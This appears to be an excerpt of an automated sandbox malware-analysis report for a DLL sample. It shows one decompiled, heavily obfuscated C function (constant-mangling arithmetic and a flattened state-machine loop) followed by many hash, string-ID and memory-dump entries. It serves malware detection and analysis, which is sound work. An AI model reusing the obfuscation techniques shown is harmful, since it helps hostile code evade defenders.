                          • Opcode Fuzzy Hash: dc6c3330aecbe450c0f2d54dc396fb1e62dda7a123133a99ac1f8e8ea5054fdb
                          • Instruction Fuzzy Hash: C1D11E724093809FC768CF66C889A1BFBF1FB89748F10891DF69586260D7B28949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00D48D3D() {
                          				signed int _v4;
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _t139;
                          				intOrPtr _t141;
                          				intOrPtr _t147;
                          				signed int _t151;
                          				signed int _t152;
                          				signed int _t153;
                          				signed int _t154;
                          				intOrPtr* _t155;
                          				signed int _t170;
                          				void* _t172;
                          				signed int* _t174;
                          
                          				_t174 =  &_v60;
                          				_v4 = _v4 & 0x00000000;
                          				_v16 = 0xb96ea3;
                          				_v12 = 0x2b597c;
                          				_v8 = 0x15d14c;
                          				_v24 = 0xfb9f01;
                          				_v24 = _v24 + 0xffffc2ea;
                          				_v24 = _v24 ^ 0x00f09b24;
                          				_v28 = 0x44d8ac;
                          				_v28 = _v28 << 2;
                          				_v28 = _v28 ^ 0x0118b46b;
                          				_v56 = 0xb4bcfb;
                          				_v56 = _v56 >> 0x10;
                          				_v56 = _v56 + 0x1918;
                          				_t151 = 0x33;
                          				_v56 = _v56 / _t151;
                          				_t172 = 0x18a299a;
                          				_v56 = _v56 ^ 0x00075f97;
                          				_v60 = 0x54631c;
                          				_t152 = 0x32;
                          				_v60 = _v60 / _t152;
                          				_v60 = _v60 + 0xe0cb;
                          				_v60 = _v60 + 0x7b8a;
                          				_v60 = _v60 ^ 0x000a1fda;
                          				_v32 = 0x2b0ed;
                          				_v32 = _v32 >> 0xb;
                          				_v32 = _v32 | 0x09ea9e28;
                          				_v32 = _v32 ^ 0x09ed7baa;
                          				_v48 = 0x16a7f0;
                          				_v48 = _v48 << 6;
                          				_t170 = 0x54;
                          				_v48 = _v48 / _t170;
                          				_t153 = 0x50;
                          				_v48 = _v48 / _t153;
                          				_v48 = _v48 ^ 0x000d9328;
                          				_v52 = 0x3f1fdb;
                          				_v52 = _v52 | 0x0053e637;
                          				_v52 = _v52 ^ 0xce168c33;
                          				_v52 = _v52 >> 4;
                          				_v52 = _v52 ^ 0x0ce6f5f4;
                          				_v36 = 0x33e495;
                          				_v36 = _v36 + 0xc7cc;
                          				_v36 = _v36 / _t170;
                          				_v36 = _v36 + 0x230d;
                          				_v36 = _v36 ^ 0x000308d4;
                          				_v40 = 0xaa804b;
                          				_t139 = _v40;
                          				_t154 = 0x42;
                          				_t169 = _t139 % _t154;
                          				_v40 = _t139 / _t154;
                          				_v40 = _v40 + 0xffff246c;
                          				_v40 = _v40 >> 7;
                          				_v40 = _v40 ^ 0x000d5f20;
                          				_v44 = 0x5ad1c5;
                          				_v44 = _v44 + 0x4d5e;
                          				_v44 = _v44 + 0xffff9f53;
                          				_v44 = _v44 + 0xffff11b0;
                          				_v44 = _v44 ^ 0x005bbdbb;
                          				_v20 = 0x89125f;
                          				_v20 = _v20 ^ 0x0bb83411;
                          				_v20 = _v20 ^ 0x0b3ba340;
                          				_t155 =  *0xd56208; // 0x0
                          				do {
                          					while(_t172 != 0x550abf) {
                          						if(_t172 == 0x18a299a) {
                          							_push(_t155);
                          							_push(_t155);
                          							_t155 = E00D3C5D8(0x2c);
                          							_t174 =  &(_t174[3]);
                          							 *0xd56208 = _t155;
                          							_t172 = 0x550abf;
                          							continue;
                          						} else {
                          							if(_t172 != 0x6125a42) {
                          								goto L8;
                          							} else {
                          								_t147 = E00D40EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E00D536AA);
                          								_t155 =  *0xd56208; // 0x0
                          								 *_t155 = _t147;
                          							}
                          						}
                          						L5:
                          						return 0 | _t155 != 0x00000000;
                          					}
                          					_t169 = _v48;
                          					_t141 = E00D348DD(_v32, _v48, _v52);
                          					_t155 =  *0xd56208; // 0x0
                          					_t174 = _t174 - 0x10 + 0x14;
                          					_t172 = 0x6125a42;
                          					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
                          					L8:
                          				} while (_t172 != 0x92686f5);
                          				goto L5;
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #$ _$7S$^M$|Y+
                          • API String ID: 0-3744723356
                          • Opcode ID: 60d3ced8a935fb358d9d71b784e0c3f390821ebb91a14987aaeb4412828ea319
                          • Instruction ID: 500eb1f1a43bb5e5af3a02679c2bcc6544f1df76a371d83a255924fb3faeb9f9
                          • Opcode Fuzzy Hash: 60d3ced8a935fb358d9d71b784e0c3f390821ebb91a14987aaeb4412828ea319
                          • Instruction Fuzzy Hash: FF5166715083419FD348DF25D88A50FBBE1FBC8768F008A1DF499A6260D7B5CA49CF5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $P$ap@'$-$ma+
                          • API String ID: 0-1845766705
                          • Opcode ID: 1f6a788eb6250741679efa4dae341608ef638c084ceea656ead5af70767d57e0
                          • Instruction ID: 21770013e940b0a3ee5bd0b1b03feac9d74d9e3e447f7329c121bb862671bf15
                          • Opcode Fuzzy Hash: 1f6a788eb6250741679efa4dae341608ef638c084ceea656ead5af70767d57e0
                          • Instruction Fuzzy Hash: 2D918A716083419BC628CF24D89992FBBE1FBD4318F144E2EF69656260C770DA49CBA3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4r~$Zr$n<$p3
                          • API String ID: 0-1989199487
                          • Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
                          • Instruction ID: 067f925e795cc8e436b371fe9b8508c69d4db33504abd2c883dd7b09806d8cdf
                          • Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
                          • Instruction Fuzzy Hash: 716155715083409FC358CE26C48952FBBE1FBD8758F144A2DF29AA6260D3B4CA89CF56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [$R[+$Y$v@
                          • API String ID: 0-1276245682
                          • Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
                          • Instruction ID: b7c6c0e0ca8a7091c32249254ec12c61c76759bccf917ca827ebac1b0ddf97e2
                          • Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
                          • Instruction Fuzzy Hash: 19614372C00209EFCF08DFE0D94AAEEBBB5FB48304F208159E911B6260D7B55A55CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <f~$<o$l@$}0
                          • API String ID: 0-758050912
                          • Opcode ID: 81aabe2cacc40ca78a0a0bd0b7a3bfaf129779c12e0e85beb0b3127220a46710
                          • Instruction ID: ede1ebd94ae940cb1187dbb9c1dfb415e362cd65a1119fe414e9922f5f16d613
                          • Opcode Fuzzy Hash: 81aabe2cacc40ca78a0a0bd0b7a3bfaf129779c12e0e85beb0b3127220a46710
                          • Instruction Fuzzy Hash: F2516571108340AFC744CF66D89942FBBE1EFC8368F54591DF99696260D3B1CA488F9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #FZ$^di_$g#$y^
                          • API String ID: 0-3614166594
                          • Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
                          • Instruction ID: 18c9f1c2ca3921d90cd4902b5294a3be08d5ae9db3a3a4f8e2c0b506193216ff
                          • Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
                          • Instruction Fuzzy Hash: AF31F372800208FBCF05DFA5DC098DEBFB6FF89304F508159FA10A6120D3B68A60AF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <S$tU$zPB
                          • API String ID: 0-3909742637
                          • Opcode ID: 20485632ce87518b22678c02ce7e6d5d4dad39b3afe56a200c29dd119bf08fad
                          • Instruction ID: 454f4d26579c79499bcdcf00cb404f21086d0b728ed20d2beff8d35e78d1a6ba
                          • Opcode Fuzzy Hash: 20485632ce87518b22678c02ce7e6d5d4dad39b3afe56a200c29dd119bf08fad
                          • Instruction Fuzzy Hash: 53F1FD715083809FD368CF21C58AA4BFBF2FBC5758F50891DE6AA96260D7B18909CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "$%;$K3
                          • API String ID: 0-3594330084
                          • Opcode ID: f7044b5173f9d2a29f25416d3282c1d5a6daf1c4eab99132a200a181acee52d3
                          • Instruction ID: 2e7ee2d15172fd35093b0953bc4ce56e114bc1abfb28c060288865fc00e59b1b
                          • Opcode Fuzzy Hash: f7044b5173f9d2a29f25416d3282c1d5a6daf1c4eab99132a200a181acee52d3
                          • Instruction Fuzzy Hash: BAA161725083809FD358DF6AC989A5BBBE2FBC4758F40891DF1869A220D3B58949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )$B:o$kb
                          • API String ID: 0-1085388577
                          • Opcode ID: 6a7416e707ce5b5be4caa493017c2dded001c85c0994b7965ad07e3c46f5a48f
                          • Instruction ID: 2e966b0846a8e515dd3390980bef61180c3246e1ff293029697e0d034c9eefd6
                          • Opcode Fuzzy Hash: 6a7416e707ce5b5be4caa493017c2dded001c85c0994b7965ad07e3c46f5a48f
                          • Instruction Fuzzy Hash: 24A120B15083419FC398CF69C98A41BBBF1FBC4758F109A2DF59696260D3B18A09CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: '$8~"$$w%
                          • API String ID: 1586166983-1780403920
                          Uniqueness

                          Uniqueness Score: -1.00%

                          • API String ID: 0-1706687062
                          • Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
                          • Instruction ID: 099546588878c676e0112060a323c7c5e4419f52dd5697a074dcf4abe73f6ce6
                          • Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
                          • Instruction Fuzzy Hash: C84156724083019FC344DF21A98944FBBE1BBD8758F154A2DF8A966261C3718A59CFA7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: bg$~z#
                          • API String ID: 0-3633068236
                          • Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
                          • Instruction ID: 826afbadb6cd0a88a6b5ddf851a5b4a235803a656a9bed209331bb080351f143
                          • Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
                          • Instruction Fuzzy Hash: AE414276C0061EDBDF58CEA0C84A5EEBBB1BF54318F248199D451B6260C7B80B4ACFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: bWr$(8r
                          • API String ID: 0-4034592896
                          • Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
                          • Instruction ID: a9517ea8d82ec23bd74f0dd120db30bc6900b9febd215890798426449c01951a
                          • Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
                          • Instruction Fuzzy Hash: 6D411471C00219EFCF18DFA4D98A9EEBBB5FB04304F20818AE511B6264D3B55B85CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !+s
                          • API String ID: 0-2041718826
                          • Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
                          • Instruction ID: 509ab1713e0ce6d937b3664d669a2d1485016602c5ab180a1a55f16022edf805
                          • Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
                          • Instruction Fuzzy Hash: 31910E720083449FD758CF66C88991BFBE1FBC5B58F40892DF69686260D3B6C949CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: i*_
                          • API String ID: 0-4175851924
                          • Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
                          • Instruction ID: 3929e8bd8b280a79eb99996b8c6dbc2222288375d42f8eb3cfdbe9d530c3ae4e
                          • Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
                          • Instruction Fuzzy Hash: A68151721083409FD754CE61D98992BBBF1EBC5B58F00891DF9929A260D3B6C909CF93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <;M
                          • API String ID: 0-164005337
                          • Opcode ID: 69bc5a0c2629d2e7e2e113d8c4d6675f6c19ab6e61c56634021a7ea7df04c153
                          • Instruction ID: 5ad3ac48b09c3d6eaf9551fd96b813f4ee50a2c7a6c0a8a8571168aaf218bba7
                          • Opcode Fuzzy Hash: 69bc5a0c2629d2e7e2e113d8c4d6675f6c19ab6e61c56634021a7ea7df04c153
                          • Instruction Fuzzy Hash: 28917871D11319EBCB58CFA5D98A9EEBBB1FF44310F20805AE512BB290D7B41A45CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ft
                          • API String ID: 0-1468847975
                          • Opcode ID: 3069f0047465a9c194763303a9e1f1c47edbb6f122cf9a34fa4510940e167e66
                          • Instruction ID: 14f02259021f14972b62c122c2ea1a79047278d48eabe0f127bde2166ef21623
                          • Opcode Fuzzy Hash: 3069f0047465a9c194763303a9e1f1c47edbb6f122cf9a34fa4510940e167e66
                          • Instruction Fuzzy Hash: 19516C7290C3018BC358DF24D88542BBBE0FBD4768F144A1DF9DAA6161D7B1CA49CBA7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >Z
                          • API String ID: 0-2342695272
                          • Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
                          • Instruction ID: 62556579b93b6d8895a3a500bb9a52f020ef4c687a43a158fa4b91ab899be68e
                          • Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
                          • Instruction Fuzzy Hash: E241B2726183119BC304DF29C48585BFBE1FFC8718F494A6EF889A7250D774D905CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: \Lh
                          • API String ID: 0-2235754405
                          • Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
                          • Instruction ID: c9eb216f14d7d0f33f5c419b09a3020b429ea077c975b46af5b857593cb021f5
                          • Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
                          • Instruction Fuzzy Hash: FB419AB1108742CFC768CE21D88582BBBE5FFD8348F104A1DF5D552260EB75CA09CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: B:}I
                          • API String ID: 0-2889142627
                          • Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
                          • Instruction ID: 384dbc7bbd1087ae016e05745eab586dda1a349a0f783ec2d7919ae067f5e543
                          • Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
                          • Instruction Fuzzy Hash: 7E4188B1508342DBD758CF21E98582BBBE4FBD4758F140A1DF582922A1D7B58A0D8FA3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: WLX
                          • API String ID: 0-2077286540
                          • Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
                          • Instruction ID: 0a34b4efbc9a08cba1415fd8452dd5555f719a4d174e1bbb3525b65b280f7dc4
                          • Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
                          • Instruction Fuzzy Hash: 1741E0B2D0120DEBCF05DFA5D94A8EEBBB5FB48314F208159E912B7220D3B54A55CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $Jx
                          • API String ID: 0-2488101295
                          • Opcode ID: 50626a7505fd0e3553684f9399c30ebcc8b478af8f47350c9e4e3f9f46474ab9
                          • Instruction ID: b8bb0d7342851465fe9ee5f9b97b0d74fc220174fc0b3c85f5e5484e808457c6
                          • Opcode Fuzzy Hash: 50626a7505fd0e3553684f9399c30ebcc8b478af8f47350c9e4e3f9f46474ab9
                          • Instruction Fuzzy Hash: CF4133B1D0021AEBDF08CFE5C98A5EEFBB1FB44318F248159D512B7250D7B85A498FA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'iY
                          • API String ID: 0-1691070665
                          • Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
                          • Instruction ID: 5c3bfb542cb889929b9d5837d036f8b5d39f9059cc8fb864d512a418495f8ef3
                          • Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
                          • Instruction Fuzzy Hash: 2F412672E00219EBEF08DFA5D94A9EEFBB2FB44304F208059D515BB290D7B55A15CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ^
                          • API String ID: 0-1590793086
                          • Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
                          • Instruction ID: aed7c95b761f3c9e59be203144b5de142068b1538d49a59da0128e206577f80c
                          • Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
                          • Instruction Fuzzy Hash: 993187712093429FC718CF24958500FBBE1FBD4748F104A2DF586A2220D3B4DA1E8BE7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: P/
                          • API String ID: 0-4116444305
                          • Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
                          • Instruction ID: 7f1e624822c4dee0c0519ef98f80065db25518c4a8a62cc704c99e6d9afde5e6
                          • Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
                          • Instruction Fuzzy Hash: 4931427190130AEFCF48CFA1CA0689FBBB1FF44304F108549EA26A6220C3B59B61DF91
